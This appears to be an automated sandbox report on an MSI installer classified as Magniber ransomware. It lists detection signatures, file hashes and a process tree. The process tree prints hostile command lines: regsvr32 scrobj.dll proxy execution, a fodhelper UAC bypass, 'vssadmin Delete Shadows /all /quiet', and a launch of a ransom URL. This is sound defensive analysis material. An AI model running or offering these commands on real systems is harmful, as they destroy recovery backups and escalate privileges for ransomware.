Overview

overview

10

Static

static

1

41ef278a86...3e.msi

windows7-x64

6

41ef278a86...3e.msi

windows10-2004-x64

10

Analysis

  • max time kernel
    145s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05-08-2024 09:53

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    41ef278a866d57e3c81882e4ad7f6d04ae6b066cfd5632120d9ac4332d66753e.msi

  • Size

    96KB

  • MD5

    42ad49ed99c0d41a820316309bc2c3b3

  • SHA1

    f447a72b3cbea72e1b56fda8f44fd9f304b4474a

  • SHA256

    41ef278a866d57e3c81882e4ad7f6d04ae6b066cfd5632120d9ac4332d66753e

  • SHA512

    4e0af295dc656ad70361363c77646fb899a1ff4a816790959e090125bdba2089eb058dfa2b18bdcede34b45d9420b6f57c0db6aefa32f9799eccec3f163bdf75

  • SSDEEP

    1536:kiqCWq/Gf2CJ7ZrhzZr98n+lW0D80D+7fxun:xqCWqu+q8nLLxun

Score
10/10
magniberdefense_evasiondiscoveryexecutionimpactpersistenceprivilege_escalationransomware

Malware Config

Signatures

  • Detect magniber ransomware 1 IoCs
  • Magniber Ransomware

    Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.

    ransomwaremagniber
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomwaredefense_evasionimpactexecution
  • Renames multiple (86) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • System Binary Proxy Execution: Regsvr32 1 TTPs 9 IoCs

    Abuse Regsvr32 to proxy execution of malicious code.

    defense_evasion
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 9 IoCs
  • Loads dropped DLL 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
    persistenceprivilege_escalation
  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Interacts with shadow copies 3 TTPs 6 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Modifies registry class 14 IoCs
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 27 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:3012
    • C:\Windows\system32\regsvr32.exe
      regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/x5m0mhr74m7
      2⤵
      • System Binary Proxy Execution: Regsvr32
      • Modifies registry class
      PID:1300
    • C:\Windows\system32\cmd.exe
      cmd /c "start fodhelper.exe"
      2⤵
        PID:1752
        • C:\Windows\system32\fodhelper.exe
          fodhelper.exe
          3⤵
            PID:3184
            • C:\Windows\system32\regsvr32.exe
              "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh
              4⤵
              • System Binary Proxy Execution: Regsvr32
              PID:4144
              • C:\Windows\System32\vssadmin.exe
                "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
                5⤵
                • Interacts with shadow copies
                PID:4884
        • C:\Windows\system32\cmd.exe
          cmd /c "start fodhelper.exe"
          2⤵
            PID:292
            • C:\Windows\system32\fodhelper.exe
              fodhelper.exe
              3⤵
                PID:4144
                • C:\Windows\system32\regsvr32.exe
                  "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh
                  4⤵
                  • System Binary Proxy Execution: Regsvr32
                  PID:892
                  • C:\Windows\System32\vssadmin.exe
                    "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
                    5⤵
                    • Interacts with shadow copies
                    PID:3672
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
            1⤵
            • Suspicious use of WriteProcessMemory
            PID:2248
            • C:\Windows\system32\regsvr32.exe
              regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/x5m0mhr74m7
              2⤵
              • System Binary Proxy Execution: Regsvr32
              • Modifies registry class
              PID:4964
            • C:\Windows\system32\cmd.exe
              cmd /c "start fodhelper.exe"
              2⤵
                PID:2572
                • C:\Windows\system32\fodhelper.exe
                  fodhelper.exe
                  3⤵
                    PID:4944
                    • C:\Windows\system32\regsvr32.exe
                      "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh
                      4⤵
                      • System Binary Proxy Execution: Regsvr32
                      PID:2176
                      • C:\Windows\System32\vssadmin.exe
                        "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
                        5⤵
                        • Interacts with shadow copies
                        PID:2388
                • C:\Windows\system32\cmd.exe
                  cmd /c "start fodhelper.exe"
                  2⤵
                    PID:3608
                    • C:\Windows\system32\fodhelper.exe
                      fodhelper.exe
                      3⤵
                        PID:1288
                        • C:\Windows\system32\regsvr32.exe
                          "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh
                          4⤵
                          • System Binary Proxy Execution: Regsvr32
                          PID:4072
                          • C:\Windows\System32\vssadmin.exe
                            "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
                            5⤵
                            • Interacts with shadow copies
                            PID:3484
                  • C:\Windows\system32\taskhostw.exe
                    taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                    1⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2720
                    • C:\Windows\system32\regsvr32.exe
                      regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/x5m0mhr74m7
                      2⤵
                      • System Binary Proxy Execution: Regsvr32
                      • Modifies registry class
                      PID:2268
                    • C:\Windows\system32\cmd.exe
                      cmd /c "start fodhelper.exe"
                      2⤵
                        PID:2388
                        • C:\Windows\system32\fodhelper.exe
                          fodhelper.exe
                          3⤵
                            PID:2992
                            • C:\Windows\system32\regsvr32.exe
                              "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh
                              4⤵
                              • System Binary Proxy Execution: Regsvr32
                              PID:4956
                              • C:\Windows\System32\vssadmin.exe
                                "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
                                5⤵
                                • Interacts with shadow copies
                                PID:1852
                        • C:\Windows\system32\cmd.exe
                          cmd /c "start fodhelper.exe"
                          2⤵
                            PID:3740
                            • C:\Windows\system32\fodhelper.exe
                              fodhelper.exe
                              3⤵
                                PID:5088
                                • C:\Windows\system32\regsvr32.exe
                                  "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh
                                  4⤵
                                  • System Binary Proxy Execution: Regsvr32
                                  PID:284
                                  • C:\Windows\System32\vssadmin.exe
                                    "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
                                    5⤵
                                    • Interacts with shadow copies
                                    PID:2076
                          • C:\Windows\system32\msiexec.exe
                            msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\41ef278a866d57e3c81882e4ad7f6d04ae6b066cfd5632120d9ac4332d66753e.msi
                            1⤵
                            • Enumerates connected drives
                            • Event Triggered Execution: Installer Packages
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of FindShellTrayWindow
                            PID:4688
                          • C:\Windows\system32\msiexec.exe
                            C:\Windows\system32\msiexec.exe /V
                            1⤵
                            • Enumerates connected drives
                            • Drops file in Windows directory
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:1648
                            • C:\Windows\system32\srtasks.exe
                              C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
                              2⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3184
                            • C:\Windows\System32\MsiExec.exe
                              C:\Windows\System32\MsiExec.exe -Embedding F3882F54BD9C6F8E0C80682FF1A12653
                              2⤵
                              • Suspicious use of SetThreadContext
                              • Loads dropped DLL
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious behavior: MapViewOfSection
                              • Suspicious use of WriteProcessMemory
                              PID:2132
                              • C:\Windows\System32\cmd.exe
                                cmd /c "start microsoft-edge:http://b8b8bac06c8446608c7ctbodbmuw.ofrisk.info/tbodbmuw^&2^&42452619^&86^&423^&2219041
                                3⤵
                                • Suspicious use of WriteProcessMemory
                                PID:1408
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:http://b8b8bac06c8446608c7ctbodbmuw.ofrisk.info/tbodbmuw&2&42452619&86&423&2219041
                                  4⤵
                                  • Enumerates system info in registry
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                  • Suspicious use of FindShellTrayWindow
                                  • Suspicious use of SendNotifyMessage
                                  • Suspicious use of WriteProcessMemory
                                  PID:1612
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fffada446f8,0x7fffada44708,0x7fffada44718
                                    5⤵
                                      PID:3164
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1984,13386464511371523450,7170398037282117841,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:2
                                      5⤵
                                        PID:2520
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1984,13386464511371523450,7170398037282117841,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:3
                                        5⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:3468
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1984,13386464511371523450,7170398037282117841,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2716 /prefetch:8
                                        5⤵
                                          PID:1372
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,13386464511371523450,7170398037282117841,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
                                          5⤵
                                            PID:4172
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,13386464511371523450,7170398037282117841,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
                                            5⤵
                                              PID:3672
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,13386464511371523450,7170398037282117841,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4056 /prefetch:1
                                              5⤵
                                                PID:3220
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,13386464511371523450,7170398037282117841,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5036 /prefetch:1
                                                5⤵
                                                  PID:932
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1984,13386464511371523450,7170398037282117841,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5428 /prefetch:8
                                                  5⤵
                                                    PID:3076
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1984,13386464511371523450,7170398037282117841,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5428 /prefetch:8
                                                    5⤵
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:2952
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,13386464511371523450,7170398037282117841,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5040 /prefetch:1
                                                    5⤵
                                                      PID:3112
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,13386464511371523450,7170398037282117841,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4080 /prefetch:1
                                                      5⤵
                                                        PID:3380
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,13386464511371523450,7170398037282117841,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5260 /prefetch:1
                                                        5⤵
                                                          PID:2352
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,13386464511371523450,7170398037282117841,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3584 /prefetch:1
                                                          5⤵
                                                            PID:852
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,13386464511371523450,7170398037282117841,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2188 /prefetch:1
                                                            5⤵
                                                              PID:280
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,13386464511371523450,7170398037282117841,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1076 /prefetch:1
                                                              5⤵
                                                                PID:2968
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1984,13386464511371523450,7170398037282117841,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6008 /prefetch:2
                                                                5⤵
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:3796
                                                      • C:\Windows\system32\vssvc.exe
                                                        C:\Windows\system32\vssvc.exe
                                                        1⤵
                                                        • Checks SCSI registry key(s)
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:4076
                                                      • C:\Windows\System32\CompPkgSrv.exe
                                                        C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                        1⤵
                                                          PID:4788
                                                        • C:\Windows\System32\CompPkgSrv.exe
                                                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                          1⤵
                                                            PID:1448

                                                          Network

                                                          MITRE ATT&CK Enterprise v15

                                                          Replay Monitor

                                                          Loading Replay Monitor...

                                                          Downloads

                                                          • C:\Config.Msi\e57d5ee.rbs
                                                            Filesize

                                                            7KB

                                                            MD5

                                                            daaa14e12f7918f68ca15cbe1d89d7c3

                                                            SHA1

                                                            ed4d22652d7cb3b5e97bf7494206064cb60f9cbc

                                                            SHA256

                                                            8992caa8f3b8f3a0b8c1e7b7fa3f03f0dc740a4706f8c55ad231ee3b5cbe136d

                                                            SHA512

                                                            c3b3c20f92d40efecb038d7dd38b569f4b02f247554b8185d801a347f76c6f64c0c9f4a0941673cc6b536549fcac7ec0ea8c5796af50eb60d4e380e954b307d6

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                            Filesize

                                                            152B

                                                            MD5

                                                            847d47008dbea51cb1732d54861ba9c9

                                                            SHA1

                                                            f2099242027dccb88d6f05760b57f7c89d926c0d

                                                            SHA256

                                                            10292fa05d896a2952c1d602a72d761d34bc776b44d6a7df87e49b5b613a8ac1

                                                            SHA512

                                                            bd1526aa1cc1c016d95dfcc53a78b45b09dde4ce67357fc275ab835dbe1bb5b053ca386239f50cde95ad243a9c1bbb12f7505818577589beecc6084f7b94e83f

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                            Filesize

                                                            6KB

                                                            MD5

                                                            1395eff98e674f8ba046abc41849f8de

                                                            SHA1

                                                            5f85324e3721ca0d501ebd00eeffc52b085ed02f

                                                            SHA256

                                                            a4e90a61b3f3c56494dafa60c5ca479ddc6c8e82f00bd6e792998d0a5528027e

                                                            SHA512

                                                            e6a5f5fa9fe85bdebb8f6f89612159b88290982ef7c4edd73a5d16803678bc55aa629dc9ed2f8be9c59facdb6ae3c3fec894ee00c63cd3a7b7959943f2ec0c32

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                            Filesize

                                                            6KB

                                                            MD5

                                                            acedd69ed89843acfba3901fa38cf095

                                                            SHA1

                                                            1c9569ab4e77355367436c77f5b50315eb7c9459

                                                            SHA256

                                                            9ba652e66458d06802a2e6bbbab8206ad49d50350df4dd1e568536154da239f2

                                                            SHA512

                                                            7055ddce4b4694f19a5dad6f3e97a8d6d3a8cea0454ad8a35f8bd20ae2b953d3b679ccea9e00f2286e5e70e71ecc51acaec3d345e609b1f9f406ca8637906f09

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
                                                            Filesize

                                                            16B

                                                            MD5

                                                            6752a1d65b201c13b62ea44016eb221f

                                                            SHA1

                                                            58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                            SHA256

                                                            0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                            SHA512

                                                            9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                                            Filesize

                                                            10KB

                                                            MD5

                                                            b71c06ca8d1c29f45b151de78c1019c4

                                                            SHA1

                                                            3c32399b8da4e61046e69ed50fec12cf61828922

                                                            SHA256

                                                            64c532b171f861c6b10124453b99d2d1fe01da550cfe59c3cb10371689bf2f34

                                                            SHA512

                                                            34a701be7ee1dc3a318bac82280d37e4cd1cbc0c0d86b597e9b0230c637f02d16d0d26cd9adabe5dbf76c08179285d59a97aeddc4e98db54fa2bf0f9783953aa

                                                            Download Submit

                                                          • C:\Users\Admin\Pictures\README.html
                                                            Filesize

                                                            17KB

                                                            MD5

                                                            8644163030d3ae48c38d0498df8b3162

                                                            SHA1

                                                            71ceb4b6f1464b726d7ecca1319b5c908a5515c6

                                                            SHA256

                                                            fe4a55b62ebb7f75c2b2d7d79ed573e23111775e2f8a88c3d651a7a18881d009

                                                            SHA512

                                                            29e9d11948185e8f9e94b9c3f4c6b2ab4f3be71f0d934da7a768b23ff3e7147c146f856bea0e431b9f41e3512a6f2adc65e3f3cff1ef4ec51ac4473857fa486a

                                                            Download Submit

                                                          • C:\Users\Public\dsv3cwbg27yh
                                                            Filesize

                                                            1KB

                                                            MD5

                                                            947919690674ae37064deafb3fa326db

                                                            SHA1

                                                            b79f7f3ad22c9e84546750502f517d16a7618366

                                                            SHA256

                                                            fa4d045e690fbaa4f22fc3827f168e59791e1677ee6c5888a37aa8caf964d801

                                                            SHA512

                                                            c7fcc911acc3084985f07add40a0a41d6628ca567016551196744444e39a562444385647ea5741357bf8bc49695e9cd83cb9d6c45be6f71ef31263b52ba0e32b

                                                            Download Submit

                                                          • C:\Users\Public\x5m0mhr74m7
                                                            Filesize

                                                            4KB

                                                            MD5

                                                            a756835ce38c068139d8fad26cb47fed

                                                            SHA1

                                                            c1bb3d145188606d07e7b29d86ea6a08586e268d

                                                            SHA256

                                                            d5cfccfe2e3f5ecb566543c74f2972176f61a857234fd33a48325e9459742a78

                                                            SHA512

                                                            d18aa222daf8c3e51e5bf58d2c6ff531b0db92a03f8546efa8add0ac77de4649b1cc73811ad991cc75eb2a9eb22b07ca5d0924569440aba99ce0416527547fac

                                                            Download Submit

                                                          • C:\Windows\Installer\MSID67A.tmp
                                                            Filesize

                                                            56KB

                                                            MD5

                                                            91de8a79098ac3d20726e1acb50cd05d

                                                            SHA1

                                                            9cb04003c75f0cb63fe0c6dcd22a0c64d63154be

                                                            SHA256

                                                            54f8d71fb3117854743d594aa28427b943e5b2fb46f6003dbf4a9b562ebbfcea

                                                            SHA512

                                                            70cf1fe2c4d9b68c12b30df9013c4a1fd5b5a9fef1de704a42535259d1196b35eca6191270b19dedc4d3699b8211868b6b31a5ae3cccdc24711fb335fc32edc3

                                                            Download Submit

                                                          • C:\Windows\Installer\e57d5ed.msi
                                                            Filesize

                                                            96KB

                                                            MD5

                                                            42ad49ed99c0d41a820316309bc2c3b3

                                                            SHA1

                                                            f447a72b3cbea72e1b56fda8f44fd9f304b4474a

                                                            SHA256

                                                            41ef278a866d57e3c81882e4ad7f6d04ae6b066cfd5632120d9ac4332d66753e

                                                            SHA512

                                                            4e0af295dc656ad70361363c77646fb899a1ff4a816790959e090125bdba2089eb058dfa2b18bdcede34b45d9420b6f57c0db6aefa32f9799eccec3f163bdf75

                                                            Download Submit

                                                          • \??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2
                                                            Filesize

                                                            23.7MB

                                                            MD5

                                                            c4ddd887cee0972063d4b7d0c8cefe7e

                                                            SHA1

                                                            ab119679df21e8e71c50e9e36018b35227edd3bf

                                                            SHA256

                                                            2fa381c387ccd79e9795b15956588f318a9b6d9af9394461305dbb40f3a651e2

                                                            SHA512

                                                            1496b04a64bb76004d8a9bf8eb9b3ea6b81d55c30fa567b6b3cd89ed2d6c4e1ceba0df22a1053b1003196cb5dcab87fe244c1309b4c7242d78ff173a10b1ce15

                                                            Download Submit

                                                          • \??\Volume{f3a72b53-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{e5fd38bd-4249-4dfa-b99e-f29aac8d31ac}_OnDiskSnapshotProp
                                                            Filesize

                                                            6KB

                                                            MD5

                                                            2df15714d89be007861f7caeaef779b3

                                                            SHA1

                                                            ccdb244787316c7950063afb7c4e47d774d046c8

                                                            SHA256

                                                            f04a34a96dedbb989d95e74e8a1a996f365515523c570d72f129e66dfbcc3950

                                                            SHA512

                                                            6008698e758f7df9f9c8186e581a34a594b5ca9109f7de5ff686c7edeadd7bb9d87f013381c992ef92db891ec51a9177b9327a45ef059605198c5dc7618ee878

                                                            Download Submit

                                                          • memory/3012-11-0x000001F573640000-0x000001F573643000-memory.dmp

                                                            Filesize

                                                            12KB

                                                            Download